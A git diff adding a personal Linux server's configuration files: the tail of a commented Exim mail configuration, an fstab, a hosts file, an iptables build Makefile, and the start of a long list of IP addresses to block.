+# error to be logged, and the delivery to be deferred. This is a paranoic
+# safety catch. There is an even stronger safety catch in the form of the
+# FIXED_NEVER_USERS setting in the configuration for building Exim. The list of
+# users that it specifies is built into the binary, and cannot be changed. The
+# option below just adds additional users to the list. The default for
+# FIXED_NEVER_USERS is "root", but just to be absolutely sure, the default here
+# is also "root".
+
+# Note that the default setting means you cannot deliver mail addressed to root
+# as if it were a normal user. This isn't usually a problem, as most sites have
+# an alias for root that redirects such mail to a human administrator.
+
+never_users = root
+
+
+# The setting below causes Exim to do a reverse DNS lookup on all incoming
+# IP calls, in order to get the true host name. If you feel this is too
+# expensive, you can specify the networks for which a lookup is done, or
+# remove the setting entirely.
+
+host_lookup = *
+
+
+# The settings below cause Exim to make RFC 1413 (ident) callbacks
+# for all incoming SMTP calls. You can limit the hosts to which these
+# calls are made, and/or change the timeout that is used. If you set
+# the timeout to zero, all RFC 1413 calls are disabled. RFC 1413 calls
+# are cheap and can provide useful information for tracing problem
+# messages, but some hosts and firewalls have problems with them.
+# This can result in a timeout instead of an immediate refused
+# connection, leading to delays on starting up SMTP sessions.
+# (The default was reduced from 30s to 5s for release 4.61. and to
+# disabled for release 4.86)
+#
+#rfc1413_hosts = *
+#rfc1413_query_timeout = 5s
+
+
+# Enable an efficiency feature.  We advertise the feature; clients
+# may request to use it.  For multi-recipient mails we then can
+# reject or accept per-user after the message is received.
+#
+prdr_enable = true
+
+
+# By default, Exim expects all envelope addresses to be fully qualified, that
+# is, they must contain both a local part and a domain. If you want to accept
+# unqualified addresses (just a local part) from certain hosts, you can specify
+# these hosts by setting one or both of
+#
+# sender_unqualified_hosts =
+# recipient_unqualified_hosts =
+#
+# to control sender and recipient addresses, respectively. When this is done,
+# unqualified addresses are qualified using the settings of qualify_domain
+# and/or qualify_recipient (see above).
+
+
+# Unless you run a high-volume site you probably want more logging
+# detail than the default.  Adjust to suit.
+
+log_selector = +smtp_protocol_error +smtp_syntax_error \
+	+tls_certificate_verified
+#      +address_rewrite \
+#        +all_parents \
+#        +arguments \
+#        +connection_reject \
+#        +delay_delivery \
+#        +delivery_size \
+#        +dnslist_defer \
+#        +incoming_interface \
+#        +incoming_port \
+#        +lost_incoming_connection \
+#        +queue_run \
+#        +received_sender \
+#        +received_recipients \
+#        +retry_defer \
+#        +sender_on_delivery \
+#        +size_reject \
+#        +skip_delivery \
+#        +smtp_confirmation \
+#        +smtp_connection \
+#        +smtp_protocol_error \
+#        +smtp_syntax_error \
+#        +subject \
+#        +tls_cipher \
+#        +tls_peerdn \
+
+
+
+
+# If you want Exim to support the "percent hack" for certain domains,
+# uncomment the following line and provide a list of domains. The "percent
+# hack" is the feature by which mail addressed to x%y@z (where z is one of
+# the domains listed) is locally rerouted to x@y and sent on. If z is not one
+# of the "percent hack" domains, x%y is treated as an ordinary local part. This
+# hack is rarely needed nowadays; you should not enable it unless you are sure
+# that you really need it.
+#
+# percent_hack_domains =
+#
+# As well as setting this option you will also need to remove the test
+# for local parts containing % in the ACL definition below.
+
+
+# When Exim can neither deliver a message nor return it to sender, it "freezes"
+# the delivery error message (aka "bounce message"). There are also other
+# circumstances in which messages get frozen. They will stay on the queue for
+# ever unless one of the following options is set.
+
+# This option unfreezes frozen bounce messages after two days, tries
+# once more to deliver them, and ignores any delivery failures.
+
+ignore_bounce_errors_after = 2d
+
+# This option cancels (removes) frozen messages that are older than a week.
+
+timeout_frozen_after = 7d
+
+
+# By default, messages that are waiting on Exim's queue are all held in a
+# single directory called "input" which it itself within Exim's spool
+# directory. (The default spool directory is specified when Exim is built, and
+# is often /var/spool/exim/.) Exim works best when its queue is kept short, but
+# there are circumstances where this is not always possible. If you uncomment
+# the setting below, messages on the queue are held in 62 subdirectories of
+# "input" instead of all in the same directory. The subdirectories are called
+# 0, 1, ... A, B, ... a, b, ... z. This has two benefits: (1) If your file
+# system degrades with many files in one directory, this is less likely to
+# happen; (2) Exim can process the queue one subdirectory at a time instead of
+# all at once, which can give better performance with large queues.
+
+# split_spool_directory = true
+
+
+# If you're in a part of the world where ASCII is not sufficient for most
+# text, then you're probably familiar with RFC2047 message header extensions.
+# By default, Exim adheres to the specification, including a limit of 76
+# characters to a line, with encoded words fitting within a line.
+# If you wish to use decoded headers in message filters in such a way
+# that successful decoding of malformed messages matters, you may wish to
+# configure Exim to be more lenient.
+#
+# check_rfc2047_length = false
+#
+# In particular, the Exim maintainers have had multiple reports of problems
+# from Russian administrators of issues until they disable this check,
+# because of some popular, yet buggy, mail composition software.
+
+
+# If you wish to be strictly RFC compliant, or if you know you'll be
+# exchanging email with systems that are not 8-bit clean, then you may
+# wish to disable advertising 8BITMIME.  Uncomment this option to do so.
+
+# accept_8bitmime = false
+
+
+# Exim does not make use of environment variables itself. However,
+# libraries that Exim uses (e.g. LDAP) depend on specific environment settings.
+# There are two lists: keep_environment for the variables we trust, and
+# add_environment for variables we want to set to a specific value.
+# Note that TZ is handled separateley by the timezone runtime option
+# and TIMEZONE_DEFAULT buildtime option.
+
+# keep_environment = ^LDAP
+# add_environment = PATH=/usr/bin::/bin
+
+
+
+######################################################################
+#                       ACL CONFIGURATION                            #
+#         Specifies access control lists for incoming SMTP mail      #
+######################################################################
+
+begin acl
+
+# This access control list is used for every RCPT command in an incoming
+# SMTP message. The tests are run in order until the address is either
+# accepted or denied.
+
+acl_check_rcpt:
+
+  # Accept if the source is local SMTP (i.e. not over TCP/IP). We do this by
+  # testing for an empty sending host field.
+
+  accept  hosts = :
+          control = dkim_disable_verify
+
+  #############################################################################
+  # The following section of the ACL is concerned with local parts that contain
+  # @ or % or ! or / or | or dots in unusual places.
+  #
+  # The characters other than dots are rarely found in genuine local parts, but
+  # are often tried by people looking to circumvent relaying restrictions.
+  # Therefore, although they are valid in local parts, these rules lock them
+  # out, as a precaution.
+  #
+  # Empty components (two dots in a row) are not valid in RFC 2822, but Exim
+  # allows them because they have been encountered. (Consider local parts
+  # constructed as "firstinitial.secondinitial.familyname" when applied to
+  # someone like me, who has no second initial.) However, a local part starting
+  # with a dot or containing /../ can cause trouble if it is used as part of a
+  # file name (e.g. for a mailing list). This is also true for local parts that
+  # contain slashes. A pipe symbol can also be troublesome if the local part is
+  # incorporated unthinkingly into a shell command line.
+  #
+  # Two different rules are used. The first one is stricter, and is applied to
+  # messages that are addressed to one of the local domains handled by this
+  # host. The line "domains = +local_domains" restricts it to domains that are
+  # defined by the "domainlist local_domains" setting above. The rule  blocks
+  # local parts that begin with a dot or contain @ % ! / or |. If you have
+  # local accounts that include these characters, you will have to modify this
+  # rule.
+
+  deny    message       = Restricted characters in address
+          domains       = +local_domains
+          local_parts   = ^[.] : ^.*[@%!/|]
+
+  # The second rule applies to all other domains, and is less strict. The line
+  # "domains = !+local_domains" restricts it to domains that are NOT defined by
+  # the "domainlist local_domains" setting above. The exclamation mark is a
+  # negating operator. This rule allows your own users to send outgoing
+  # messages to sites that use slashes and vertical bars in their local parts.
+  # It blocks local parts that begin with a dot, slash, or vertical bar, but
+  # allows these characters within the local part. However, the sequence /../
+  # is barred. The use of @ % and ! is blocked, as before. The motivation here
+  # is to prevent your users (or your users' viruses) from mounting certain
+  # kinds of attack on remote sites.
+
+  deny    message       = Restricted characters in address
+          domains       = !+local_domains
+          local_parts   = ^[./|] : ^.*[@%!] : ^.*/\\.\\./
+  #############################################################################
+
+  # Accept mail to postmaster in any local domain, regardless of the source,
+  # and without verifying the sender.
+
+  accept  local_parts   = postmaster
+          domains       = +local_domains
+
+  # Deny unless the sender address can be verified.
+
+  require verify        = sender
+
+  # Accept if the message comes from one of the hosts for which we are an
+  # outgoing relay. It is assumed that such hosts are most likely to be MUAs,
+  # so we set control=submission to make Exim treat the message as a
+  # submission. It will fix up various errors in the message, for example, the
+  # lack of a Date: header line. If you are actually relaying out out from
+  # MTAs, you may want to disable this. If you are handling both relaying from
+  # MTAs and submissions from MUAs you should probably split them into two
+  # lists, and handle them differently.
+
+  # Recipient verification is omitted here, because in many cases the clients
+  # are dumb MUAs that don't cope well with SMTP error responses. If you are
+  # actually relaying out from MTAs, you should probably add recipient
+  # verification here.
+
+  # Note that, by putting this test before any DNS black list checks, you will
+  # always accept from these hosts, even if they end up on a black list. The
+  # assumption is that they are your friends, and if they get onto a black
+  # list, it is a mistake.
+
+  accept  hosts         = +relay_from_hosts
+          control       = submission
+          control       = dkim_disable_verify
+
+  # Accept if the message arrived over an authenticated connection, from
+  # any host. Again, these messages are usually from MUAs, so recipient
+  # verification is omitted, and submission mode is set. And again, we do this
+  # check before any black list tests.
+
+  accept  authenticated = *
+          control       = submission
+          control       = dkim_disable_verify
+
+  # Insist that a HELO/EHLO was accepted.
+
+  require message	= nice hosts say HELO first
+          condition	= ${if def:sender_helo_name}
+
+  # Insist that any other recipient address that we accept is either in one of
+  # our local domains, or is in a domain for which we explicitly allow
+  # relaying. Any other domain is rejected as being unacceptable for relaying.
+
+  require message = relay not permitted
+          domains = +local_domains : +relay_to_domains
+
+  # We also require all accepted addresses to be verifiable. This check will
+  # do local part verification for local domains, but only check the domain
+  # for remote domains. The only way to check local parts for the remote
+  # relay domains is to use a callout (add /callout), but please read the
+  # documentation about callouts before doing this.
+
+  require verify = recipient
+
+  #############################################################################
+  # There are no default checks on DNS black lists because the domains that
+  # contain these lists are changing all the time. However, here are two
+  # examples of how you can get Exim to perform a DNS black list lookup at this
+  # point. The first one denies, whereas the second just warns.
+  #
+  # deny    message       = rejected because $sender_host_address is in a black list at $dnslist_domain\n$dnslist_text
+  #         dnslists      = black.list.example
+  #
+  # warn    dnslists      = black.list.example
+  #         add_header    = X-Warning: $sender_host_address is in a black list at $dnslist_domain
+  #         log_message   = found in $dnslist_domain
+  #############################################################################
+
+  #############################################################################
+  # This check is commented out because it is recognized that not every
+  # sysadmin will want to do it. If you enable it, the check performs
+  # Client SMTP Authorization (csa) checks on the sending host. These checks
+  # do DNS lookups for SRV records. The CSA proposal is currently (May 2005)
+  # an Internet draft. You can, of course, add additional conditions to this
+  # ACL statement to restrict the CSA checks to certain hosts only.
+  #
+  # require verify = csa
+  #############################################################################
+
+  # At this point, the address has passed all the checks that have been
+  # configured, so we accept it unconditionally.
+
+  accept
+
+
+# This ACL is used after the contents of a message have been received. This
+# is the ACL in which you can test a message's headers or body, and in
+# particular, this is where you can invoke external virus or spam scanners.
+# Some suggested ways of configuring these tests are shown below, commented
+# out. Without any tests, this ACL accepts all messages. If you want to use
+# such tests, you must ensure that Exim is compiled with the content-scanning
+# extension (WITH_CONTENT_SCAN=yes in Local/Makefile).
+
+acl_check_data:
+
+  # Deny if the message contains an overlong line.  Per the standards
+  # we should never receive one such via SMTP.
+  #
+  deny    message    = maximum allowed line length is 998 octets, \
+                       got $max_received_linelength
+          condition  = ${if > {$max_received_linelength}{998}}
+
+  # Deny if the message contains a virus. Before enabling this check, you
+  # must install a virus scanner and set the av_scanner option above.
+  #
+  # deny    malware    = *
+  #         message    = This message contains a virus ($malware_name).
+
+  # Add headers to a message if it is judged to be spam. Before enabling this,
+  # you must install SpamAssassin. You may also need to set the spamd_address
+  # option above.
+  #
+  # warn    spam       = nobody
+  #         add_header = X-Spam_score: $spam_score\n\
+  #                      X-Spam_score_int: $spam_score_int\n\
+  #                      X-Spam_bar: $spam_bar\n\
+  #                      X-Spam_report: $spam_report
+
+  # Accept the message.
+
+  accept
+
+
+
+######################################################################
+#                      ROUTERS CONFIGURATION                         #
+#               Specifies how addresses are handled                  #
+######################################################################
+#     THE ORDER IN WHICH THE ROUTERS ARE DEFINED IS IMPORTANT!       #
+# An address is passed to each router in turn until it is accepted.  #
+######################################################################
+
+begin routers
+
+# This router routes to remote hosts over SMTP by explicit IP address,
+# when an email address is given in "domain literal" form, for example,
+# <user@[192.168.35.64]>. The RFCs require this facility. However, it is
+# little-known these days, and has been exploited by evil people seeking
+# to abuse SMTP relays. Consequently it is commented out in the default
+# configuration. If you uncomment this router, you also need to uncomment
+# allow_domain_literals above, so that Exim can recognize the syntax of
+# domain literal addresses.
+
+# domain_literal:
+#   driver = ipliteral
+#   domains = ! +local_domains
+#   transport = remote_smtp
+
+
+# This router routes addresses that are not in local domains by doing a DNS
+# lookup on the domain name. The exclamation mark that appears in "domains = !
+# +local_domains" is a negating operator, that is, it can be read as "not". The
+# recipient's domain must not be one of those defined by "domainlist
+# local_domains" above for this router to be used.
+#
+# If the router is used, any domain that resolves to 0.0.0.0 or to a loopback
+# interface address (127.0.0.0/8) is treated as if it had no DNS entry. Note
+# that 0.0.0.0 is the same as 0.0.0.0/32, which is commonly treated as the
+# local host inside the network stack. It is not 0.0.0.0/0, the default route.
+# If the DNS lookup fails, no further routers are tried because of the no_more
+# setting, and consequently the address is unrouteable.
+
+dnslookup:
+  driver = dnslookup
+  domains = ! +local_domains
+  transport = remote_smtp
+  ignore_target_hosts = 0.0.0.0 : 127.0.0.0/8
+# if ipv6-enabled then instead use:
+# ignore_target_hosts = <; 0.0.0.0 ; 127.0.0.0/8 ; ::1
+  no_more
+
+
+# This alternative router can be used when you want to send all mail to a
+# server which handles DNS lookups for you; an ISP will typically run such
+# a server for their customers.  If you uncomment "smarthost" then you
+# should comment out "dnslookup" above.  Setting a real hostname in route_data
+# wouldn't hurt either.
+
+# smarthost:
+#   driver = manualroute
+#   domains = ! +local_domains
+#   transport = remote_smtp
+#   route_data = MAIL.HOSTNAME.FOR.CENTRAL.SERVER.EXAMPLE
+#   ignore_target_hosts = <; 0.0.0.0 ; 127.0.0.0/8 ; ::1
+#   no_more
+
+
+# The remaining routers handle addresses in the local domain(s), that is those
+# domains that are defined by "domainlist local_domains" above.
+
+
+# This router handles aliasing using a linearly searched alias file with the
+# name /etc/exim/aliases. When this configuration is installed automatically,
+# the name gets inserted into this file from whatever is set in Exim's
+# build-time configuration. The default path is the traditional /etc/aliases.
+# If you install this configuration by hand, you need to specify the correct
+# path in the "data" setting below.
+#
+##### NB  You must ensure that the alias file exists. It used to be the case
+##### NB  that every Unix had that file, because it was the Sendmail default.
+##### NB  These days, there are systems that don't have it. Your aliases
+##### NB  file should at least contain an alias for "postmaster".
+#
+# If any of your aliases expand to pipes or files, you will need to set
+# up a user and a group for these deliveries to run under. You can do
+# this by uncommenting the "user" option below (changing the user name
+# as appropriate) and adding a "group" option if necessary. Alternatively, you
+# can specify "user" on the transports that are used. Note that the transports
+# listed below are the same as are used for .forward files; you might want
+# to set up different ones for pipe and file deliveries from aliases.
+
+system_aliases:
+  driver = redirect
+  allow_fail
+  allow_defer
+  data = ${lookup{$local_part}lsearch{/etc/exim/aliases}}
+# user = exim
+  file_transport = address_file
+  pipe_transport = address_pipe
+
+
+# This router handles forwarding using traditional .forward files in users'
+# home directories. If you want it also to allow mail filtering when a forward
+# file starts with the string "# Exim filter" or "# Sieve filter", uncomment
+# the "allow_filter" option.
+
+# The no_verify setting means that this router is skipped when Exim is
+# verifying addresses. Similarly, no_expn means that this router is skipped if
+# Exim is processing an EXPN command.
+
+# If you want this router to treat local parts with suffixes introduced by "-"
+# or "+" characters as if the suffixes did not exist, uncomment the two local_
+# part_suffix options. Then, for example, xxxx-foo@your.domain will be treated
+# in the same way as xxxx@your.domain by this router. Because this router is
+# not used for verification, if you choose to uncomment those options, then you
+# will *need* to make the same change to the localuser router.  (There are
+# other approaches, if this is undesirable, but they add complexity).
+
+# The check_ancestor option means that if the forward file generates an
+# address that is an ancestor of the current one, the current one gets
+# passed on instead. This covers the case where A is aliased to B and B
+# has a .forward file pointing to A.
+
+# The three transports specified at the end are those that are used when
+# forwarding generates a direct delivery to a file, or to a pipe, or sets
+# up an auto-reply, respectively.
+
+userforward:
+  driver = redirect
+  check_local_user
+# local_part_suffix = +* : -*
+# local_part_suffix_optional
+  file = $home/.forward
+# allow_filter
+  no_verify
+  no_expn
+  check_ancestor
+  file_transport = address_file
+  pipe_transport = address_pipe
+  reply_transport = address_reply
+
+
+# This router matches local user mailboxes. If the router fails, the error
+# message is "Unknown user".
+
+# If you want this router to treat local parts with suffixes introduced by "-"
+# or "+" characters as if the suffixes did not exist, uncomment the two local_
+# part_suffix options. Then, for example, xxxx-foo@your.domain will be treated
+# in the same way as xxxx@your.domain by this router.
+
+localuser:
+  driver = accept
+  check_local_user
+# local_part_suffix = +* : -*
+# local_part_suffix_optional
+  transport = local_delivery
+  cannot_route_message = Unknown user
+
+
+
+######################################################################
+#                      TRANSPORTS CONFIGURATION                      #
+######################################################################
+#                       ORDER DOES NOT MATTER                        #
+#     Only one appropriate transport is called for each delivery.    #
+######################################################################
+
+# A transport is used only when referenced from a router that successfully
+# handles an address.
+
+begin transports
+
+
+# This transport is used for delivering messages over SMTP connections.
+# Refuse to send any message with over-long lines, which could have
+# been received other than via SMTP. The use of message_size_limit to
+# enforce this is a red herring.
+
+remote_smtp:
+  driver = smtp
+  message_size_limit = ${if > {$max_received_linelength}{998} {1}{0}}
+
+
+# This transport is used for local delivery to user mailboxes in traditional
+# BSD mailbox format. By default it will be run under the uid and gid of the
+# local user, and requires the sticky bit to be set on the /var/mail directory.
+# Some systems use the alternative approach of running mail deliveries under a
+# particular group instead of using the sticky bit. The commented options below
+# show how this can be done.
+
+local_delivery:
+  driver = appendfile
+  file = /var/mail/$local_part
+  delivery_date_add
+  envelope_to_add
+  return_path_add
+# group = mail
+# mode = 0660
+
+
+# This transport is used for handling pipe deliveries generated by alias or
+# .forward files. If the pipe generates any standard output, it is returned
+# to the sender of the message as a delivery error. Set return_fail_output
+# instead of return_output if you want this to happen only when the pipe fails
+# to complete normally. You can set different transports for aliases and
+# forwards if you want to - see the references to address_pipe in the routers
+# section above.
+
+address_pipe:
+  driver = pipe
+  return_output
+
+
+# This transport is used for handling deliveries directly to files that are
+# generated by aliasing or forwarding.
+
+address_file:
+  driver = appendfile
+  delivery_date_add
+  envelope_to_add
+  return_path_add
+
+
+# This transport is used for handling autoreplies generated by the filtering
+# option of the userforward router.
+
+address_reply:
+  driver = autoreply
+
+
+
+######################################################################
+#                      RETRY CONFIGURATION                           #
+######################################################################
+
+begin retry
+
+# This single retry rule applies to all domains and all errors. It specifies
+# retries every 15 minutes for 2 hours, then increasing retry intervals,
+# starting at 1 hour and increasing each time by a factor of 1.5, up to 16
+# hours, then retries every 6 hours until 4 days have passed since the first
+# failed delivery.
+
+# WARNING: If you do not have any retry rules at all (this section of the
+# configuration is non-existent or empty), Exim will not do any retries of
+# messages that fail to get delivered at the first attempt. The effect will
+# be to treat temporary errors as permanent. Therefore, DO NOT remove this
+# retry rule unless you really don't want any retries.
+
+# Address or Domain    Error       Retries
+# -----------------    -----       -------
+
+*                      *           F,2h,15m; G,16h,1h,1.5; F,4d,6h
+
+
+
+######################################################################
+#                      REWRITE CONFIGURATION                         #
+######################################################################
+
+# There are no rewriting specifications in this default configuration file.
+
+begin rewrite
+
+
+
+######################################################################
+#                   AUTHENTICATION CONFIGURATION                     #
+######################################################################
+
+# The following authenticators support plaintext username/password
+# authentication using the standard PLAIN mechanism and the traditional
+# but non-standard LOGIN mechanism, with Exim acting as the server.
+# PLAIN and LOGIN are enough to support most MUA software.
+#
+# These authenticators are not complete: you need to change the
+# server_condition settings to specify how passwords are verified.
+# They are set up to offer authentication to the client only if the
+# connection is encrypted with TLS, so you also need to add support
+# for TLS. See the global configuration options section at the start
+# of this file for more about TLS.
+#
+# The default RCPT ACL checks for successful authentication, and will accept
+# messages from authenticated users from anywhere on the Internet.
+
+begin authenticators
+
+# PLAIN authentication has no server prompts. The client sends its
+# credentials in one lump, containing an authorization ID (which we do not
+# use), an authentication ID, and a password. The latter two appear as
+# $auth2 and $auth3 in the configuration and should be checked against a
+# valid username and password. In a real configuration you would typically
+# use $auth2 as a lookup key, and compare $auth3 against the result of the
+# lookup, perhaps using the crypteq{}{} condition.
+
+#PLAIN:
+#  driver                     = plaintext
+#  server_set_id              = $auth2
+#  server_prompts             = :
+#  server_condition           = Authentication is not yet configured
+#  server_advertise_condition = ${if def:tls_in_cipher }
+
+# LOGIN authentication has traditional prompts and responses. There is no
+# authorization ID in this mechanism, so unlike PLAIN the username and
+# password are $auth1 and $auth2. Apart from that you can use the same
+# server_condition setting for both authenticators.
+
+#LOGIN:
+#  driver                     = plaintext
+#  server_set_id              = $auth1
+#  server_prompts             = <| Username: | Password:
+#  server_condition           = Authentication is not yet configured
+#  server_advertise_condition = ${if def:tls_in_cipher }
+
+
+######################################################################
+#                   CONFIGURATION FOR local_scan()                   #
+######################################################################
+
+# If you have built Exim to include a local_scan() function that contains
+# tables for private options, you can define those options here. Remember to
+# uncomment the "begin" line. It is commented by default because it provokes
+# an error with Exim binaries that are not built with LOCAL_SCAN_HAS_OPTIONS
+# set in the Local/Makefile.
+
+# begin local_scan
+
+
+# End of Exim configuration file
diff --git a/linux/conf/fstab b/linux/conf/fstab
new file mode 100644
index 0000000..23dd98c
--- /dev/null
+++ b/linux/conf/fstab
@@ -0,0 +1,36 @@
+#
+# /etc/fstab: static file system information
+#
+# <file system>        <dir>     <type>    <options>                        <dump> <pass>
+
+#/dev/#EXT4FS_ROOT#    /         ext4      defaults                         0      1
+#/dev/#BTRFS_ROOT#     /         btrfs     defaults                         0      0
+#/dev/#XFS_ROOT#       /         xfs       defaults                         0      0
+#/dev/#SWAP#           swap      swap      defaults                         0      0
+#/dev/#EXT4FS_HOME#    /home     ext4      defaults                         0      2
+#/dev/#BTRFS_HOME#     /home     btrfs     defaults                         0      0
+#/dev/#XFS_HOME#       /home     xfs       defaults                         0      0
+#/dev/cdrom            /cdrom    iso9660   ro,user,noauto,unhide            0      0
+#/dev/dvd              /dvd      udf       ro,user,noauto,unhide            0      0
+#/dev/floppy/0         /floppy   vfat      user,noauto,unhide               0      0
+#tmp                   /tmp      tmpfs     defaults                         0      0
+#shm                   /dev/shm  tmpfs     defaults                         0      0
+#usb                   /proc/bus/usb usbfs defaults                         0      0
+
+# End of file
+#/dev/sda3 on / type ext4 (rw,relatime,data=ordered)
+/dev/sda3  				   / 		ext4	defaults,noatime,ro				0	1
+devpts                 		           /dev/pts	devpts	noexec,nosuid,gid=tty,mode=0620			0	0
+none                                       /sys/kernel/security securityfs defaults                             0       0
+devpts                 		           /dev/pts	devpts	noexec,nosuid,gid=tty,mode=0620			0	0
+shm                   			   /dev/shm	tmpfs	defaults                                        0       0
+tmp                                        /tmp         tmpfs   defaults,noatime,nosuid,nodev,noexec,size=128M  0       0
+
+UUID=3b408790-65e1-4638-9591-7ba61f266913  /boot	ext4	defaults,ro,noatime		  		0	2
+UUID=962D-0DE1				   /boot/efi	vfat	ro,noauto,umask=0077      			0	2
+UUID=f2336a56-fbe6-444c-bdbf-f0e6c209c237  /var		ext4	defaults,nodev,noexec,nosuid,errors=remount-ro  0	2
+UUID=20bd3948-0877-4192-af52-ad87d6f96db0  /usr		ext4	defaults,ro,nodev,errors=remount-ro		0	2
+UUID=66c083d6-b8f2-4a98-ae55-9412f98cc089  /usr/ports	ext4	defaults,ro,nodev,errors=remount-ro		0	2
+pkgmk                                      /usr/ports/work tmpfs   size=30G,gid=101,uid=100,defaults 		0       2
+UUID=36e9e1d5-8356-451e-a301-81098b9a15ea  /srv		ext4	defaults,nodev,errors=remount-ro		0	2
+UUID=cd15196a-69f1-4fb4-9730-a384c62add91  /home        ext4    defaults,nodev,nosuid,errors=remount-ro		0	2
diff --git a/linux/conf/hosts b/linux/conf/hosts
new file mode 100644
index 0000000..81c73a6
--- /dev/null
+++ b/linux/conf/hosts
@@ -0,0 +1,20 @@
+#
+# /etc/hosts: static lookup table for host names
+#
+# IPv4 LocalHosts
+127.0.0.1	localhost.localdomain localhost
+127.0.0.1       machine.example machine
+
+# IPv4 Internet
+#<ip-address>	<hostname.domain.org>	<aliases>
+10.0.0.1	machine.example.org
+
+# IPv6
+#::1		ip6-localhost	ip6-loopback
+#fe00::0	ip6-localnet
+#ff00::0	ip6-mcastprefix
+#ff02::1	ip6-allnodes
+#ff02::2	ip6-allrouters
+#ff02::3	ip6-allhosts
+
+# End of file
diff --git a/linux/conf/iptables/Makefile b/linux/conf/iptables/Makefile
new file mode 100644
index 0000000..6933b8d
--- /dev/null
+++ b/linux/conf/iptables/Makefile
@@ -0,0 +1,4 @@
+
+blockip:
+	gcc -g -o ip_blocker ip_blocker.c -lip4tc -lip6tc -ldl
+	#gcc -g -o ip_blocker ip_blocker.c -liptc -lip4tc -lip6tc -ldl
diff --git a/linux/conf/iptables/blockedip b/linux/conf/iptables/blockedip
new file mode 100644
index 0000000..46fa229
--- /dev/null
+++ b/linux/conf/iptables/blockedip
@@ -0,0 +1,17351 @@
+1.10.140.44
+1.119.129.17
+1.156.75.44
+1.158.42.147
+1.160.138.142
+1.160.167.119
+1.160.82.74
+1.161.1.77
+1.161.215.212
+1.161.218.193
+1.161.223.2
+1.161.29.205
+1.161.7.118
+1.162.118.23
+1.162.144.228
+1.162.161.9
+1.162.229.215
+1.162.46.114
+1.162.98.233
+1.163.103.126
+1.163.110.187
+1.163.158.121
+1.163.42.57
+1.163.79.236
+1.163.80.35
+1.164.120.63
+1.164.243.53
+1.164.38.71
+1.164.39.86
+1.164.42.90
+1.165.150.115
+1.165.157.40
+1.165.162.144
+1.165.174.105
+1.165.181.245
+1.165.188.224
+1.168.112.35
+1.168.51.13
+1.169.245.162
+1.169.72.92
+1.170.152.72
+1.170.187.243
+1.170.23.105
+1.170.25.113
+1.170.86.250
+1.171.52.76
+1.171.67.71
+1.172.184.83
+1.172.190.131
+1.172.237.209
+1.172.99.232
+1.173.111.172
+1.173.114.241
+1.173.160.189
+1.173.165.15
+1.173.165.83
+1.173.184.175
+1.173.194.210
+1.173.208.121
+1.173.89.231
+1.175.113.137
+1.175.127.201
+1.175.145.127
+1.175.167.122
+1.175.172.169
+1.175.174.56
+1.175.218.30
+1.175.222.15
+1.175.61.133
+1.175.82.63
+1.176.134.231
+1.176.134.234
+1.176.134.248
+1.177.162.4
+1.177.63.18
+1.179.130.24
+1.179.156.116
+1.180.186.182
+1.186.98.227
+1.186.98.236
+1.188.177.89
+1.196.113.84
+1.196.90.198
+1.199.31.100
+1.20.137.168
+1.20.151.75
+1.20.156.140
+1.202.128.68
+1.207.1.61
+1.214.219.196
+1.22.124.243
+1.228.225.6
+1.232.77.181
+1.235.239.3
+1.238.118.37
+1.245.107.180
+1.245.115.185
+1.245.218.103
+1.245.37.167
+1.247.245.102
+1.248.178.11
+1.25.116.81
+1.25.119.52
+1.25.152.114
+1.25.84.120
+1.251.96.44
+1.254.47.2
+1.26.99.217
+1.29.214.168
+1.30.205.27
+1.32.12.102
+1.34.105.178
+1.34.161.135
+1.34.173.249
+1.34.198.135
+1.34.201.78
+1.34.221.87
+1.34.232.219
+1.34.242.45
+1.34.35.33
+1.34.44.241
+1.34.62.169
+1.34.88.131
+1.34.94.183
+1.36.16.200
+1.36.177.124
+1.36.191.111
+1.36.214.7
+1.36.227.167
+1.36.241.104
+1.36.82.241
+1.43.241.248
+1.48.234.27
+1.48.234.88
+1.52.179.172
+1.52.224.114
+1.52.228.80
+1.52.236.254
+1.53.224.140
+1.53.240.10
+1.54.121.243
+1.54.159.251
+1.54.4.130
+1.55.123.93
+1.55.64.19
+1.55.64.46
+1.55.7.133
+1.56.176.14
+1.57.50.77
+1.58.62.70
+1.62.74.185
+1.64.139.80
+1.64.70.217
+1.64.8.64
+1.64.93.38
+1.65.179.142
+1.65.189.223
+1.69.17.75
+1.69.2.229
+1.70.119.40
+1.80.10.93
+1.85.56.178
+1.85.69.132
+1.85.82.134
+100.1.126.198
+100.14.50.189
+100.15.239.204
+100.16.120.253
+100.24.121.249
+100.33.112.5
+100.33.88.12
+100.33.94.246
+100.38.133.113
+100.8.30.223
+100.8.79.226
+100.8.86.166
+101.100.185.41
+101.109.166.101
+101.109.166.37
+101.109.252.16
+101.111.24.181
+101.132.177.139
+101.142.173.145
+101.143.154.137
+101.172.5.240
+101.176.128.42
+101.18.25.142
+101.187.116.122
+101.200.160.1
+101.200.226.138
+101.200.81.187
+101.204.229.72
+101.206.36.207
+101.207.30.250
+101.21.2.33
+101.227.64.169
+101.23.240.180
+101.230.198.136
+101.236.50.60
+101.249.174.186
+101.249.175.38
+101.249.8.168
+101.251.206.90
+101.254.149.23
+101.26.47.154
+101.29.91.184
+101.30.77.231
+101.37.71.117
+101.64.108.183
+101.64.77.86
+101.65.118.175
+101.66.133.74
+101.71.129.87
+101.78.164.148
+101.78.170.140
+101.78.187.162
+101.78.70.245
+101.79.144.195
+101.79.146.6
+101.79.148.70
+101.79.234.4
+101.81.106.50
+101.85.246.109
+101.89.119.91
+101.98.11.146
+101.99.54.100
+101.99.6.236
+101.99.74.212
+102.152.27.240
+102.152.27.32
+102.152.45.171
+102.165.124.113
+102.165.32.133
+102.165.35.0/24
+102.165.38.70
+102.165.39.144
+102.165.48.178
+102.165.48.235
+102.165.48.56
+102.165.50.223
+102.165.51.0/24
+102.165.55.35
+102.96.180.179
+103.101.57.210
+103.103.124.253
+103.103.161.69
+103.103.213.109
+103.104.52.138
+103.105.58.121
+103.106.150.77
+103.108.134.189
+103.109.177.18
+103.11.83.52
+103.110.80.13
+103.111.224.38
+103.113.153.20
+103.114.104.62
+103.114.104.76
+103.114.107.209
+103.114.107.240
+103.115.174.248
+103.117.125.78
+103.118.170.149
+103.119.170.10
+103.119.24.115
+103.119.24.120
+103.119.24.122
+103.12.133.7
+103.120.222.205
+103.121.156.124
+103.121.17.85
+103.121.243.120
+103.123.221.3
+103.123.45.47
+103.124.180.2
+103.124.205.14
+103.124.236.19
+103.125.189.115
+103.125.189.116
+103.125.190.110
+103.125.217.84
+103.127.167.156
+103.129.210.194
+103.131.24.199
+103.133.105.127
+103.133.105.35
+103.133.107.109
+103.133.107.48
+103.133.109.197
+103.133.111.61
+103.134.25.70
